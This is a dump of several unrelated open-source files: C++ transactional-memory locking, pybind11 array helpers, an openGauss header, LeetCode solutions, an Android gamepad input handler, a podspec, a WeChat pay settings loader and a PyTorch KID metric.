total[COUNTS] += rtm_stats[i][COUNTS]; total[ATTEMPTS] += rtm_stats[i][ATTEMPTS]; total[ABORTS] += rtm_stats[i][ABORTS]; total[LOCKS] += rtm_stats[i][LOCKS]; total[ABORTS_EXPLICIT] += rtm_stats[i][ABORTS_EXPLICIT]; total[ABORTS_ZERO] += rtm_stats[i][ABORTS_ZERO]; total[ABORTS_RETRY] += rtm_stats[i][ABORTS_RETRY]; total[ABORTS_NORETRY] += rtm_stats[i][ABORTS_NORETRY]; total[ABORTS_TIMEOUT] += rtm_stats[i][ABORTS_TIMEOUT]; } printf("Total: RTM_STATS C: %8d AT: %8d AB: %8d L: %6d (E: %6d Z: %6d R: %6d O: %6d T: %6d)\n", total[COUNTS], total[ATTEMPTS], total[ABORTS], total[LOCKS], total[ABORTS_EXPLICIT], total[ABORTS_ZERO], total[ABORTS_RETRY], total[ABORTS_NORETRY], total[ABORTS_TIMEOUT]); #endif } class SimpleSpinLock { volatile unsigned int state; enum { Free = 0, Busy = 1 }; public: SimpleSpinLock() : state(Free) {} void lock() { while (__sync_val_compare_and_swap(&state, Free, Busy) != Free) { do { _mm_pause(); } while (state == Busy); } } void unlock() { state = Free; } bool isLocked() const { return state == Busy; } }; #ifdef RTM_DEBUG #define INC_RTM_DEBUG_COUNT(tid, x) rtm_stats[tid][x]++ #else #define INC_RTM_DEBUG_COUNT(tid, x) #endif class TransactionScope { SimpleSpinLock &fallBackLock; TransactionScope(); /* forbidden */ public: TransactionScope(SimpleSpinLock &fallBackLock_, int max_retries = 10, int tid = 0) : fallBackLock(fallBackLock_) { int nretries = 0; INC_RTM_DEBUG_COUNT(tid, COUNTS); while (1) { ++nretries; INC_RTM_DEBUG_COUNT(tid, ATTEMPTS); unsigned status = _xbegin(); if (status == _XBEGIN_STARTED) { if (!fallBackLock.isLocked()) return; /* successfully started transaction */ _xabort(0xff); /* abort with code 0xff */ } /* abort handler */ INC_RTM_DEBUG_COUNT(tid, ABORTS); /* handle _xabort(0xff) from above */ if ((status & _XABORT_EXPLICIT) && _XABORT_CODE(status) == 0xff && !(status & _XABORT_NESTED)) { while (fallBackLock.isLocked()) _mm_pause(); /* wait until lock is free */ INC_RTM_DEBUG_COUNT(tid, ABORTS_EXPLICIT); } else if (status == 0) { INC_RTM_DEBUG_COUNT(tid, ABORTS_ZERO); } else if ((status & _XABORT_RETRY) || (status & _XABORT_CONFLICT)) { INC_RTM_DEBUG_COUNT(tid, ABORTS_RETRY); } else { INC_RTM_DEBUG_COUNT(tid, ABORTS_NORETRY); /*break;*/ /* take the fall-back lock if the retry abort flag is not set*/ } if (nretries >= max_retries) { INC_RTM_DEBUG_COUNT(tid, ABORTS_TIMEOUT); break; /* too many retries, take the fall-back lock*/ } } fallBackLock.lock(); INC_RTM_DEBUG_COUNT(tid, LOCKS); } ~TransactionScope() { if (fallBackLock.isLocked()) { fallBackLock.unlock(); } else { _xend(); } } }; #undef INC_RTM_DEBUG_COUNT
2,299
2,535
#pragma once #include <pybind11/numpy.h> #include <pybind11/pybind11.h> #include <iostream> #include <vector> #include "opencv2/core/core.hpp" namespace py = pybind11; namespace foundation { typedef py::array_t<float, py::array::c_style | py::array::forcecast> pyarray_f; typedef py::array_t<double, py::array::c_style | py::array::forcecast> pyarray_d; typedef py::array_t<int, py::array::c_style | py::array::forcecast> pyarray_int; typedef py::array_t<unsigned char, py::array::c_style | py::array::forcecast> pyarray_uint8; template <typename T> py::array_t<T> py_array_from_data(const T *data, size_t shape0) { py::array_t<T> res(shape0); std::copy(data, data + shape0, res.mutable_data()); return res; } template <typename T> py::array_t<T> py_array_from_data(const T *data, size_t shape0, size_t shape1) { py::array_t<T> res({shape0, shape1}); std::copy(data, data + shape0 * shape1, res.mutable_data()); return res; } template <typename T> py::array_t<T> py_array_from_data(const T *data, size_t shape0, size_t shape1, size_t shape2) { py::array_t<T> res({shape0, shape1, shape2}); std::copy(data, data + shape0 * shape1 * shape2, res.mutable_data()); return res; } template <typename T> py::array_t<T> py_array_from_vector(const std::vector<T> &v) { const T *data = v.size() ? &v[0] : NULL; return py_array_from_data(data, v.size()); } template <typename T> py::array_t<T> py_array_from_cvmat(const cv::Mat &m) { const T *data = m.rows ? m.ptr<T>(0) : NULL; return py_array_from_data(data, m.rows, m.cols); } template <typename T> cv::Mat pyarray_cv_mat_view_typed(T &array, int type) { int height = 1; int width = 1; if (array.ndim() == 1) { width = array.shape(0); } else if (array.ndim() == 2) { height = array.shape(0); width = array.shape(1); } return cv::Mat(height, width, type, array.mutable_data()); } cv::Mat pyarray_cv_mat_view(pyarray_f &array); cv::Mat pyarray_cv_mat_view(pyarray_d &array); cv::Mat pyarray_cv_mat_view(pyarray_int &array); cv::Mat pyarray_cv_mat_view(pyarray_uint8 &array); } // namespace foundation
911
360
<filename>src/include/vecexecutor/vecnestloop.h /* * Copyright (c) 2020 Huawei Technologies Co.,Ltd. * * openGauss is licensed under Mulan PSL v2. * You can use this software according to the terms and conditions of the Mulan PSL v2. * You may obtain a copy of Mulan PSL v2 at: * * http://license.coscl.org.cn/MulanPSL2 * * THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, * EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, * MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. * See the Mulan PSL v2 for more details. * --------------------------------------------------------------------------------------- * * vecnestloop.h * * * IDENTIFICATION * src/include/vecexecutor/vecnestloop.h * * --------------------------------------------------------------------------------------- */ #ifndef VECNESTLOOP_H #define VECNESTLOOP_H #include "vecexecutor/vecnodes.h" extern VectorBatch* ExecVecNestloop(VecNestLoopState* node); extern VecNestLoopState* ExecInitVecNestLoop(VecNestLoop* node, EState* estate, int eflags); extern void ExecEndVecNestLoop(VecNestLoopState* node); extern void ExecReScanVecNestLoop(VecNestLoopState* node); #define NL_NEEDNEWOUTER 1 #define NL_NEEDNEXTOUTROW 2 #define NL_EXECQUAL 3 #define NL_END 4 class VecNestLoopRuntime : public BaseObject { public: VecNestLoopRuntime(VecNestLoopState* runtime); template <bool ifReturnNotFull> VectorBatch* JoinT(); void Rescan(); /* To avoid Coverity Warning: missing_user_dtor */ virtual ~VecNestLoopRuntime(); private: template <bool ifTargetlistNull> void FetchOuterT(); void NextOuterRow(); void OutJoinBatchAlignInnerJoinBatch(int rows); template <JoinType type, bool doProject, bool hasJoinQual, bool hasOtherQual> VectorBatch* JoinQualT(); template <JoinType type> void InitT(List* joinqual, List* otherqual, ProjectionInfo* projInfo); void BindingFp(); VectorBatch* (VecNestLoopRuntime::*WrapperBatch)(VectorBatch* batch); VectorBatch* (VecNestLoopRuntime::*JoinOnQual)(); void (VecNestLoopRuntime::*FetchOuter)(); private: VecNestLoopState* m_runtime; // runtime status // int m_status; // a batch with 1 null row, for left/anti join // VectorBatch* m_innerNullBatch; // outer batch // VectorBatch* m_outerBatch; // 1 row from outer batch, but we set for a batch max size // VectorBatch* m_outJoinBatch; int m_outReadIdx; JoinType m_joinType; bool m_matched; VectorBatch* m_currentBatch; VectorBatch* m_bckBatch; int m_bufferRows; bool m_SimpletargetCol; bool m_outerTargetIsNull; int m_outJoinBatchRows; }; #endif
1,013
854
<gh_stars>100-1000 __________________________________________________________________________________________________ sample 116 ms submission class Solution: def minFallingPathSum(self, A): n = len(A) tmp = [ A[0][::] for i in range(2)] for i in range(1, n): for j in range(n): t1 = tmp[(i-1)%2] m = t1[j] if j > 0 and m > t1[j-1]: m = t1[j-1] if j < n-1 and m > t1[j+1]: m = t1[j+1] tmp[i%2][j] = A[i][j] + m return min(tmp[(n-1)%2]) __________________________________________________________________________________________________ sample 13532 kb submission class Solution: def minFallingPathSum(self, A: List[List[int]]) -> int: change = [0]* len(A) for row in A: new_change = [1e10]*len(row) for i in range(len(A[0])): for delta in [-1, 0, 1]: if i+delta >= 0 and i+delta < len(row): new_change[i] = min(new_change[i], change[i+delta]+row[i]) change = new_change return min(change) __________________________________________________________________________________________________
611
3,058
package de.johanneskuhlmann.gainput; import android.content.Context; import android.hardware.input.InputManager; import android.view.InputDevice; import android.view.KeyEvent; import android.view.MotionEvent; import java.util.HashMap; import java.util.Map; public class Gainput implements InputManager.InputDeviceListener { // Must have same order/values as the respective enum in GainputInputDevicePad.h enum PadButton { PadButtonLeftStickX, PadButtonLeftStickY, PadButtonRightStickX, PadButtonRightStickY, PadButtonAxis4, // L2/Left trigger PadButtonAxis5, // R2/Right trigger PadButtonAxis6, PadButtonAxis7, PadButtonAxis8, PadButtonAxis9, PadButtonAxis10, PadButtonAxis11, PadButtonAxis12, PadButtonAxis13, PadButtonAxis14, PadButtonAxis15, PadButtonAxis16, PadButtonAxis17, PadButtonAxis18, PadButtonAxis19, PadButtonAxis20, PadButtonAxis21, PadButtonAxis22, PadButtonAxis23, PadButtonAxis24, PadButtonAxis25, PadButtonAxis26, PadButtonAxis27, PadButtonAxis28, PadButtonAxis29, PadButtonAxis30, PadButtonAxis31, PadButtonAccelerationX, PadButtonAccelerationY, PadButtonAccelerationZ, PadButtonGravityX, PadButtonGravityY, PadButtonGravityZ, PadButtonGyroscopeX, PadButtonGyroscopeY, PadButtonGyroscopeZ, PadButtonMagneticFieldX, PadButtonMagneticFieldY, PadButtonMagneticFieldZ, PadButtonStart, PadButtonSelect, PadButtonLeft, PadButtonRight, PadButtonUp, PadButtonDown, PadButtonA, // Cross PadButtonB, // Circle PadButtonX, // Square PadButtonY, // Triangle PadButtonL1, PadButtonR1, PadButtonL2, PadButtonR2, PadButtonL3, // Left thumb PadButtonR3, // Right thumb PadButtonHome, // PS button PadButton17, PadButton18, PadButton19, PadButton20, PadButton21, PadButton22, PadButton23, PadButton24, PadButton25, PadButton26, PadButton27, PadButton28, PadButton29, PadButton30, PadButton31, PadButtonMax_ } // Must have same order/values as the respective enum in GainputInputDevice.h enum DeviceType { DT_MOUSE, ///< A mouse/cursor input device featuring one pointer. DT_KEYBOARD, ///< A keyboard input device. DT_PAD, ///< A joypad/gamepad input device. DT_TOUCH, ///< A touch-sensitive input device supporting multiple simultaneous pointers. DT_BUILTIN, ///< Any controls directly built into the device that also contains the screen. DT_REMOTE, ///< A generic networked input device. DT_GESTURE, ///< A gesture input device, building on top of other input devices. DT_CUSTOM, ///< A custom, user-created input device. DT_COUNT ///< The count of input device types. } public static native void nativeOnInputBool(int deviceType, int deviceIndex, int buttonId, boolean value); public static native void nativeOnInputFloat(int deviceType, int deviceIndex, int buttonId, float value); public static native void nativeOnDeviceChanged(int deviceId, boolean available); public float viewWidth = 1.0f; public float viewHeight = 1.0f; private float getRealX(float x) { return (x/viewWidth); } private float getRealY(float y) { return (y/viewHeight); } public Gainput(Context context) { inputManager_ = (InputManager) context.getSystemService(Context.INPUT_SERVICE); if (inputManager_ != null) { inputManager_.registerInputDeviceListener(this, null); } int[] deviceIds = InputDevice.getDeviceIds(); for (int deviceId : deviceIds) { InputDevice dev = InputDevice.getDevice(deviceId); int sources = dev.getSources(); if (((sources & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD) || ((sources & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK)) { onInputDeviceAdded(deviceId); } } } @Override protected void finalize() { if (inputManager_ != null) { inputManager_.unregisterInputDeviceListener(this); } } private final InputManager inputManager_; private Map<Integer, Integer> deviceIdMappings_ = new HashMap<Integer, Integer>(); private int translateDeviceIdToIndex(int deviceId) { Integer index = deviceIdMappings_.get(deviceId); if (index != null) { return index; } // Find the lowest non-used index. for (int i = 0; i < 1000; ++i) { if (!deviceIdMappings_.containsValue(i)) { deviceIdMappings_.put(deviceId, i); return i; } } return 0; } @Override public void onInputDeviceAdded(int deviceId) { nativeOnDeviceChanged(translateDeviceIdToIndex(deviceId), true); } @Override public void onInputDeviceChanged(int deviceId) { } @Override public void onInputDeviceRemoved(int deviceId) { int oldDeviceId = translateDeviceIdToIndex(deviceId); deviceIdMappings_.remove(deviceId); nativeOnDeviceChanged(oldDeviceId, false); } private void handleAxis(int deviceId, PadButton button, float value) { boolean isButton = false; if (button == PadButton.PadButtonLeft || button == PadButton.PadButtonUp) { if (value < -0.5f) value = -1.0f; else value = 0.0f; isButton = true; } else if (button == PadButton.PadButtonRight || button == PadButton.PadButtonDown) { if (value > 0.5f) value = 1.0f; else value = 0.0f; isButton = true; } if (isButton) { nativeOnInputBool(DeviceType.DT_PAD.ordinal(), deviceId, button.ordinal(), value != 0.0f); } else { nativeOnInputFloat(DeviceType.DT_PAD.ordinal(), deviceId, button.ordinal(), value); } } public boolean handleMotionEvent(MotionEvent event) { int source = event.getSource(); if ((source & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK || (source & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD) { int deviceId = translateDeviceIdToIndex(event.getDeviceId()); handleAxis(deviceId, PadButton.PadButtonLeftStickX, event.getAxisValue(MotionEvent.AXIS_X)); handleAxis(deviceId, PadButton.PadButtonLeftStickY, -event.getAxisValue(MotionEvent.AXIS_Y)); handleAxis(deviceId, PadButton.PadButtonRightStickX, event.getAxisValue(MotionEvent.AXIS_Z)); handleAxis(deviceId, PadButton.PadButtonRightStickY, -event.getAxisValue(MotionEvent.AXIS_RZ)); handleAxis(deviceId, PadButton.PadButtonAxis4, event.getAxisValue(MotionEvent.AXIS_LTRIGGER)); handleAxis(deviceId, PadButton.PadButtonAxis5, event.getAxisValue(MotionEvent.AXIS_RTRIGGER)); handleAxis(deviceId, PadButton.PadButtonLeft, event.getAxisValue(MotionEvent.AXIS_HAT_X)); handleAxis(deviceId, PadButton.PadButtonRight, event.getAxisValue(MotionEvent.AXIS_HAT_X)); handleAxis(deviceId, PadButton.PadButtonUp, event.getAxisValue(MotionEvent.AXIS_HAT_Y)); handleAxis(deviceId, PadButton.PadButtonDown, event.getAxisValue(MotionEvent.AXIS_HAT_Y)); return true; } return false; } private float getButtonState(KeyEvent event) { if (event.getAction() == KeyEvent.ACTION_DOWN) return 1.0f; return 0.0f; } private void handleButton(int deviceId, PadButton button, KeyEvent event) { float state = getButtonState(event); nativeOnInputBool(DeviceType.DT_PAD.ordinal(), deviceId, button.ordinal(), state != 0.0f); } public boolean handleKeyEvent(KeyEvent event) { int keyCode = event.getKeyCode(); int source = event.getSource(); if ((source & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK || (source & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD) { int deviceId = translateDeviceIdToIndex(event.getDeviceId()); if (keyCode == KeyEvent.KEYCODE_DPAD_UP) handleButton(deviceId, PadButton.PadButtonUp, event); else if (keyCode == KeyEvent.KEYCODE_DPAD_DOWN) handleButton(deviceId, PadButton.PadButtonDown, event); else if (keyCode == KeyEvent.KEYCODE_DPAD_LEFT) handleButton(deviceId, PadButton.PadButtonLeft, event); else if (keyCode == KeyEvent.KEYCODE_DPAD_RIGHT) handleButton(deviceId, PadButton.PadButtonRight, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_A) handleButton(deviceId, PadButton.PadButtonA, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_B) handleButton(deviceId, PadButton.PadButtonB, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_X) handleButton(deviceId, PadButton.PadButtonX, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_Y) handleButton(deviceId, PadButton.PadButtonY, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_L1) handleButton(deviceId, PadButton.PadButtonL1, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_R1) handleButton(deviceId, PadButton.PadButtonR1, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_THUMBL) handleButton(deviceId, PadButton.PadButtonL3, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_THUMBR) handleButton(deviceId, PadButton.PadButtonR3, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_SELECT) handleButton(deviceId, PadButton.PadButtonSelect, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_START) handleButton(deviceId, PadButton.PadButtonStart, event); else if (keyCode == KeyEvent.KEYCODE_HOME) handleButton(deviceId, PadButton.PadButtonHome, event); return true; } else if ((source & InputDevice.SOURCE_KEYBOARD) == InputDevice.SOURCE_KEYBOARD) { boolean down = event.getAction() == KeyEvent.ACTION_DOWN; nativeOnInputBool(DeviceType.DT_KEYBOARD.ordinal(), 0, event.getKeyCode(), down); if ((keyCode == KeyEvent.KEYCODE_VOLUME_DOWN) || (keyCode == KeyEvent.KEYCODE_VOLUME_UP)) { return false; } else { return true; } } return false; } public boolean handleTouchEvent(MotionEvent event) { try { final int action = event.getAction() & MotionEvent.ACTION_MASK; final int numberOfPointers = event.getPointerCount(); switch (action) { case MotionEvent.ACTION_DOWN: case MotionEvent.ACTION_POINTER_DOWN: { for (int i = 0; i < numberOfPointers; ++i) { final int pointerId = event.getPointerId(i); final float x_move = getRealX(event.getX(i)); final float y_move = getRealY(event.getY(i)); nativeOnInputBool(DeviceType.DT_TOUCH.ordinal(), 0, 0 + 4 * pointerId, true); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 1 + 4 * pointerId, x_move); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 2 + 4 * pointerId, y_move); } break; } case MotionEvent.ACTION_MOVE: { for (int i = 0; i < numberOfPointers; ++i) { final int pointerId = event.getPointerId(i); final float x_move = getRealX(event.getX(i)); final float y_move = getRealY(event.getY(i)); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 1 + 4 * pointerId, x_move); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 2 + 4 * pointerId, y_move); } break; } case MotionEvent.ACTION_POINTER_UP: case MotionEvent.ACTION_UP: { for (int i = 0; i < numberOfPointers; ++i) { final int pointerId = event.getPointerId(i); final float x_move = getRealX(event.getX(i)); final float y_move = getRealY(event.getY(i)); nativeOnInputBool(DeviceType.DT_TOUCH.ordinal(), 0, 0 + 4 * pointerId, false); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 1 + 4 * pointerId, x_move); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 2 + 4 * pointerId, y_move); } break; } } return true; } catch (final Exception ex) { ex.printStackTrace(); return false; } } }
4,540
5,169
<reponame>Gantios/Specs { "name": "CometDClient", "version": "1.0.0", "summary": "Swift client for CometD", "description": "CometD is a scalable web event routing bus that allows you to write low-latency, server-side, event-driven web applications. Typical examples of such applications are stock trading applications, web chat applications, online games, and monitoring consoles.", "homepage": "https://cometd.org/", "license": "MIT", "authors": { "<NAME>": "<EMAIL>" }, "platforms": { "ios": "10.0" }, "source": { "git": "https://github.com/Insurlytech/CometDClient-iOS.git", "tag": "1.0.0" }, "source_files": "Sources/**/*.swift", "exclude_files": "Classes/Exclude", "swift_versions": "5.2", "frameworks": "Foundation", "requires_arc": true, "dependencies": { "Starscream": [ "4.0.3" ], "SwiftyJSON": [ "~> 5.0" ], "XCGLogger": [ "~> 7.0.1" ] }, "swift_version": "5.2" }
399
1,534
{ "version": { "message": "Versión" }, "definitionsVersion": { "message": "Omitir definiziónes" }, "changelog": { "message": "Rechistro de cambio." } }
78
2,023
#!/usr/bin/env python import os, sys usage = "usage: %s search_text replace_text [infile [outfile]]" % os.path.basename(sys.argv[0]) if len(sys.argv) < 3: print usage else: stext = sys.argv[1] rtext = sys.argv[2] input = sys.stdin output = sys.stdout if len(sys.argv) > 3: input = open(sys.argv[3]) if len(sys.argv) > 4: output = open(sys.argv[4], 'w') for s in input.xreadlines(): output.write(s.replace(stext, rtext)) # For older versions of Python (1.5.2 and earlier) import # the string module and replace the last two lines with: # # for s in input.readlines(): # output.write(string.replace(s, stext, rtext))
305
1,088
package com.riversoft.weixin.pay.base; import com.riversoft.weixin.common.exception.WxRuntimeException; import com.riversoft.weixin.common.util.XmlObjectMapper; import org.apache.commons.io.IOUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.IOException; import java.io.InputStream; /** * 商户信息 * * Created by exizhai on 11/22/2015. */ public class PaySetting { private static Logger logger = LoggerFactory.getLogger(PaySetting.class); private static PaySetting paySetting = null; public static void setDefault(PaySetting paySetting) { PaySetting.paySetting = paySetting; } public static PaySetting defaultSetting() { if (paySetting == null) { loadFromSystemProperties(); } if (paySetting == null) { loadFromClasspath(); } if (paySetting == null) { throw new WxRuntimeException(999, "当前系统没有设置缺省的商户信息,请使用setDefault方法或者在classpath下面创建wx-pay-settings.xml文件."); } return paySetting; } private static void loadFromSystemProperties() { if(System.getProperties().contains("payconfig")) { logger.info("loading pay configuration from system properties..."); String xml = System.getProperties().getProperty("payconfig", ""); logger.info("payconfig: {}", xml); if(xml == null || "".equals(xml)) { return; } else { try { PaySetting setting = XmlObjectMapper.defaultMapper().fromXml(xml, PaySetting.class); paySetting = setting; } catch (IOException e) { } } } } private static void loadFromClasspath() { try { InputStream inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream("wx-pay-settings-test.xml"); if (inputStream == null) { inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream("wx-pay-settings.xml"); } if (inputStream != null) { String xml = IOUtils.toString(inputStream); PaySetting setting = XmlObjectMapper.defaultMapper().fromXml(xml, PaySetting.class); paySetting = setting; } } catch (IOException e) { logger.error("read settings from wx-pay-settings-test.xml or wx-pay-settings.xml failed:", e); } } /** * 商户ID */ private String mchId; /** * 商户的appId */ private String appId; /** * 秘钥 */ private String key; /** * 证书位置 */ private String certPath; /** * 证书密码 */ private String certPassword; public String getMchId() { return mchId; } public void setMchId(String mchId) { this.mchId = mchId; } public String getAppId() { return appId; } public void setAppId(String appId) { this.appId = appId; } public String getKey() { return key; } public void setKey(String key) { this.key = key; } public String getCertPath() { return certPath; } public void setCertPath(String certPath) { this.certPath = certPath; } public String getCertPassword() { return certPassword; } public void setCertPassword(String certPassword) { this.certPassword = certPassword; } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; PaySetting that = (PaySetting) o; if (!mchId.equals(that.mchId)) return false; return !(appId != null ? !appId.equals(that.appId) : that.appId != null); } @Override public int hashCode() { int result = mchId.hashCode(); result = 31 * result + (appId != null ? appId.hashCode() : 0); return result; } }
2,045
471
from typing import Optional, Tuple, Union import torch from piq.base import BaseFeatureMetric from piq.utils import _validate_input def _polynomial_kernel(X: torch.Tensor, Y: torch.Tensor = None, degree: int = 3, gamma: Optional[float] = None, coef0: float = 1.) -> torch.Tensor: """ Compute the polynomial kernel between x and y K(X, Y) = (gamma <X, Y> + coef0)^degree Args: X: Tensor with shape (n_samples_1, n_features) Y: torch.Tensor of shape (n_samples_2, n_features) degree: default 3 gamma: if None, defaults to 1.0 / n_features. coef0 : default 1 Returns: Gram matrix : Array with shape (n_samples_1, n_samples_2) Reference: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.polynomial_kernel.html """ if Y is None: Y = X if X.dim() != 2 or Y.dim() != 2: raise ValueError('Incompatible dimension for X and Y matrices: ' 'X.dim() == {} while Y.dim() == {}'.format(X.dim(), Y.dim())) if X.size(1) != Y.size(1): raise ValueError('Incompatible dimension for X and Y matrices: ' 'X.size(1) == {} while Y.size(1) == {}'.format(X.size(1), Y.size(1))) if gamma is None: gamma = 1.0 / X.size(1) K = torch.mm(X, Y.T) K *= gamma K += coef0 K.pow_(degree) return K def _mmd2_and_variance(K_XX: torch.Tensor, K_XY: torch.Tensor, K_YY: torch.Tensor, unit_diagonal: bool = False, mmd_est: str = 'unbiased', var_at_m: Optional[int] = None, ret_var: bool = False) \ -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]: # based on # https://github.com/dougalsutherland/opt-mmd/blob/master/two_sample/mmd.py # but changed to not compute the full kernel matrix at once m = K_XX.size(0) assert K_XX.size() == (m, m) assert K_XY.size() == (m, m) assert K_YY.size() == (m, m) if var_at_m is None: var_at_m = m # Get the various sums of kernels that we'll use # Kts drop the diagonal, but we don't need to compute them explicitly if unit_diagonal: diag_X = diag_Y = 1 sum_diag_X = sum_diag_Y = m sum_diag2_X = sum_diag2_Y = m else: diag_X = torch.diagonal(K_XX) diag_Y = torch.diagonal(K_YY) sum_diag_X = torch.sum(diag_X) sum_diag_Y = torch.sum(diag_Y) sum_diag2_X = _sqn(diag_X) sum_diag2_Y = _sqn(diag_Y) Kt_XX_sums = K_XX.sum(dim=1) - diag_X Kt_YY_sums = K_YY.sum(dim=1) - diag_Y K_XY_sums_0 = K_XY.sum(dim=0) K_XY_sums_1 = K_XY.sum(dim=1) Kt_XX_sum = Kt_XX_sums.sum() Kt_YY_sum = Kt_YY_sums.sum() K_XY_sum = K_XY_sums_0.sum() if mmd_est == 'biased': mmd2 = ((Kt_XX_sum + sum_diag_X) / (m * m) + (Kt_YY_sum + sum_diag_Y) / (m * m) - 2 * K_XY_sum / (m * m)) else: assert mmd_est in {'unbiased', 'u-statistic'} mmd2 = (Kt_XX_sum + Kt_YY_sum) / (m * (m - 1)) if mmd_est == 'unbiased': mmd2 -= 2 * K_XY_sum / (m * m) else: mmd2 -= 2 * (K_XY_sum - torch.trace(K_XY)) / (m * (m - 1)) if not ret_var: return mmd2 Kt_XX_2_sum = _sqn(K_XX) - sum_diag2_X Kt_YY_2_sum = _sqn(K_YY) - sum_diag2_Y K_XY_2_sum = _sqn(K_XY) dot_XX_XY = Kt_XX_sums.dot(K_XY_sums_1) dot_YY_YX = Kt_YY_sums.dot(K_XY_sums_0) m1 = m - 1 m2 = m - 2 zeta1_est = ( 1 / (m * m1 * m2) * (_sqn(Kt_XX_sums) - Kt_XX_2_sum + _sqn(Kt_YY_sums) - Kt_YY_2_sum) - 1 / (m * m1) ** 2 * (Kt_XX_sum ** 2 + Kt_YY_sum ** 2) + 1 / (m * m * m1) * ( _sqn(K_XY_sums_1) + _sqn(K_XY_sums_0) - 2 * K_XY_2_sum) - 2 / m ** 4 * K_XY_sum ** 2 - 2 / (m * m * m1) * (dot_XX_XY + dot_YY_YX) + 2 / (m ** 3 * m1) * (Kt_XX_sum + Kt_YY_sum) * K_XY_sum ) zeta2_est = ( 1 / (m * m1) * (Kt_XX_2_sum + Kt_YY_2_sum) - 1 / (m * m1) ** 2 * (Kt_XX_sum ** 2 + Kt_YY_sum ** 2) + 2 / (m * m) * K_XY_2_sum - 2 / m ** 4 * K_XY_sum ** 2 - 4 / (m * m * m1) * (dot_XX_XY + dot_YY_YX) + 4 / (m ** 3 * m1) * (Kt_XX_sum + Kt_YY_sum) * K_XY_sum ) var_est = (4 * (var_at_m - 2) / (var_at_m * (var_at_m - 1)) * zeta1_est + 2 / (var_at_m * (var_at_m - 1)) * zeta2_est) return mmd2, var_est def _sqn(tensor: torch.Tensor) -> torch.Tensor: flat = tensor.flatten() return flat.dot(flat) class KID(BaseFeatureMetric): r"""Interface of Kernel Inception Distance. It's computed for a whole set of data and uses features from encoder instead of images itself to decrease computation cost. KID can compare two data distributions with different number of samples. But dimensionalities should match, otherwise it won't be possible to correctly compute statistics. Args: degree: Degree of a polynomial functions used in kernels. Default: 3 gamma: Kernel parameter. See paper for details coef0: Kernel parameter. See paper for details var_at_m: Kernel variance. Default is `None` average: If `True` recomputes metric `n_subsets` times using `subset_size` elements. n_subsets: Number of repeats. Ignored if `average` is False subset_size: Size of each subset for repeat. Ignored if `average` is False ret_var: Whether to return variance after the distance is computed. This function will return ``Tuple[torch.Tensor, torch.Tensor]`` in this case. Default: False Examples: >>> kid_metric = KID() >>> x_feats = torch.rand(10000, 1024) >>> y_feats = torch.rand(10000, 1024) >>> kid: torch.Tensor = kid_metric(x_feats, y_feats) References: Demystifying MMD GANs https://arxiv.org/abs/1801.01401 """ def __init__(self, degree: int = 3, gamma: Optional[float] = None, coef0: int = 1, var_at_m: Optional[int] = None, average: bool = False, n_subsets: int = 50, subset_size: Optional[int] = 1000, ret_var: bool = False ) -> None: super().__init__() self.degree = degree self.gamma = gamma self.coef0 = coef0 self.ret_var = ret_var if average: self.n_subsets = n_subsets self.subset_size = subset_size else: self.n_subsets = 1 self.subset_size = None def compute_metric(self, x_features: torch.Tensor, y_features: torch.Tensor) \ -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]: """Computes KID (polynomial MMD) for given sets of features, obtained from Inception net or any other feature extractor. Samples must be in range [0, 1]. Args: x_features: Samples from data distribution. Shape :math:`(N_x, D)` y_features: Samples from data distribution. Shape :math:`(N_y, D)` Returns: KID score and variance (optional). """ _validate_input([x_features, y_features], dim_range=(2, 2), size_range=(1, 2)) var_at_m = min(x_features.size(0), y_features.size(0)) if self.subset_size is None: subset_size = x_features.size(0) else: subset_size = self.subset_size results = [] for _ in range(self.n_subsets): x_subset = x_features[torch.randperm(len(x_features))[:subset_size]] y_subset = y_features[torch.randperm(len(y_features))[:subset_size]] # use k(x, y) = (gamma <x, y> + coef0)^degree # default gamma is 1 / dim K_XX = _polynomial_kernel( x_subset, None, degree=self.degree, gamma=self.gamma, coef0=self.coef0) K_YY = _polynomial_kernel( y_subset, None, degree=self.degree, gamma=self.gamma, coef0=self.coef0) K_XY = _polynomial_kernel( x_subset, y_subset, degree=self.degree, gamma=self.gamma, coef0=self.coef0) out = _mmd2_and_variance(K_XX, K_XY, K_YY, var_at_m=var_at_m, ret_var=self.ret_var) results.append(out) if self.ret_var: score = torch.mean(torch.stack([p[0] for p in results], dim=0)) variance = torch.mean(torch.stack([p[1] for p in results], dim=0)) return (score, variance) else: score = torch.mean(torch.stack(results, dim=0)) return score
4,457
349
